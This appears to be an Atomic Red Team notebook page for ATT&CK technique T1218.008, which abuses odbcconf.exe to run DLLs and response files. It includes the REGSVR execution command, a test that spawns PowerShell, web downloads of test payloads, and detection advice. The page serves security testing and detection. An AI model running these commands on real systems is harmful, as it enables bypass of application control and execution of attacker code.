# T1218.008 - Odbcconf
Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.

Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S /A &lbrace;REGSVR "C:\Users\Public\file.dll"&rbrace;</code>). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) 


## Atomic Tests

### Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL
Execute arbitrary DLL file stored locally.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll"

```

In [ ]:
Invoke-AtomicTest T1218.008 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
odbcconf.exe /S /A {REGSVR "PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll"}
```

In [ ]:
Invoke-AtomicTest T1218.008 -TestNumbers 1

### Atomic Test #2 - Odbcconf.exe - Load Response File
Execute arbitrary response file that will spawn PowerShell.exe.
Source files: https://github.com/woanware/application-restriction-bypasses

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.008\bin\T1218.008.rsp") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "PathToAtomicsFolder\T1218.008\bin\T1218.008.rsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "PathToAtomicsFolder\T1218.008\bin\\o.dll"

```

In [ ]:
Invoke-AtomicTest T1218.008 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
cd "PathToAtomicsFolder\T1218.008\bin\"
odbcconf.exe -f "T1218.008.rsp"
```

In [ ]:
Invoke-AtomicTest T1218.008 -TestNumbers 2

## Detection
Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.